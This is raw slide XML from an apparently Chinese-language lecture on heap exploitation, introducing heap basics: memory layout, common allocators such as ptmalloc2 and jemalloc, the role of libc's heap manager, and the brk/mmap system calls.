        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="6319102" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>堆利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CB0A884-696A-4DC1-B605-06733C741227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2911687" y="2108456"/>
            <a:ext cx="5489064" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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堆管理器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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堆概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Areana</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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Chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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Bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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堆分配策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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Malloc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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堆漏洞与其利用</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5985908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33" name="Shape 625">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA6486D0-8A9D-4034-92C7-4D9DEC8B050D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="1761792"/>
            <a:ext cx="2263516" cy="321841"/>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rPr>
              <a:t>For Kernel</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 626">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DE33139-0FCF-45C5-9D03-4466DBF979C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="2083633"/>
            <a:ext cx="2263516" cy="329939"/>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Stack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 627">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B893BA63-ADB6-4EB3-8F89-D21C619B80C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="2405475"/>
            <a:ext cx="2263516" cy="708826"/>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 name="Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A17B47-B940-4CAA-9D9D-4DD07C4197CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="3114301"/>
            <a:ext cx="2263516" cy="519735"/>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shared libraries</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 629">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAF25EF-FF2C-43CD-A062-53DF30A7530B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="3634036"/>
            <a:ext cx="2263516" cy="708826"/>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 name="Shape 630">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A7E7B0-4426-41C6-B5E6-09EF155A7312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="4342862"/>
            <a:ext cx="2263516" cy="321841"/>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Heap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06B9A00-BB6D-4F23-ACAB-0CEA3C82EB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="4664703"/>
            <a:ext cx="2263516" cy="321841"/>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Data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC857F8-D716-4150-9FA1-6C044A6E2E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="4986545"/>
            <a:ext cx="2263516" cy="321841"/>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Text</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 633">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE06876-86F0-41EE-A5D6-0A27738357C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="5308386"/>
            <a:ext cx="2263516" cy="321841"/>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Unused</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Shape 634">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B8D12D-FCED-4D75-A7B7-BCBC47D77CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3198003" y="2405475"/>
            <a:ext cx="0" cy="431704"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Shape 635">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E6FCC5-243E-4E16-BEA6-EC9AC92D6451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3198003" y="3950596"/>
            <a:ext cx="0" cy="392266"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BE03EF-B4A1-4542-A27A-785FEDEB7A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6378031" y="1828797"/>
            <a:ext cx="2236510" cy="58477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什么是堆？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7072D26-E1BF-4A91-96F2-310C1BD8CF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2992567"/>
            <a:ext cx="5418338" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是虚拟地址空间的一块连续的线性区域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>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chemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>提供动态分配的内存，允许程序申请大小未知的内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>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chemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在用户与操作系统之间，作为动态内存管理的中间人</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>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chemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>响应用户的申请内存请求， 向操作系统申请内存，然后将其返回给用户程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>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chemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>管理用户所释放的内存，适 时归还给操作系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C488FD-CB9B-43A7-96B9-C990A9E7C4B0}"/>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堆概述</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42850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44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BE03EF-B4A1-4542-A27A-785FEDEB7A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567721" y="2247772"/>
            <a:ext cx="2646878" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>各种堆管理器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7072D26-E1BF-4A91-96F2-310C1BD8CF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630072" y="3192336"/>
            <a:ext cx="4522177" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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dlmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> – General purpose allocator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ptmalloc2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>glibc</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（敲黑板）</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jemalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> – FreeBSD and Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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tcmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> – Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>libumem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> – Solaris</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE958F3E-1971-488F-B0FA-0B9BFE67BF07}"/>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堆概述</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709E65F4-6436-4869-9112-164DBD7ED522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7039753" y="2832547"/>
            <a:ext cx="4338918" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>堆管理器并非由操作系统实现，而是由libc.so.6链接库实现。 封装了一些系统调用，为用户提供方便的动态内存分配接口的同时，力求高效地管理由系统调用申请来的内存。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160235835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44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BE03EF-B4A1-4542-A27A-785FEDEB7A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552010" y="2370426"/>
            <a:ext cx="2954655"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申请内存的系统调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7072D26-E1BF-4A91-96F2-310C1BD8CF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613984" y="3273013"/>
            <a:ext cx="2069123" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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brk</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mmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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56501412-DFA9-4B90-9B1C-2E7885255270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695092" y="1318847"/>
            <a:ext cx="2171700" cy="891612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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Application</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC03BAF9-DA9D-41FF-ABDC-5FC6E5E3E5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695092" y="2652266"/>
            <a:ext cx="2171700" cy="891612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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malloc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接箭头连接符 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C54A7A1-7DC9-4CD7-96E6-DE1A6EF3C5DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5780942" y="2210459"/>
            <a:ext cx="0" cy="441807"/>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A89004C6-0788-4A1E-AC89-BDEDCEECCE84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523392" y="4094285"/>
            <a:ext cx="2171700" cy="891612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{766D6B21-7803-419E-8FBB-1CBE7B231DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523392" y="5427704"/>
            <a:ext cx="2171700" cy="891612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sys_brk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="直接箭头连接符 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
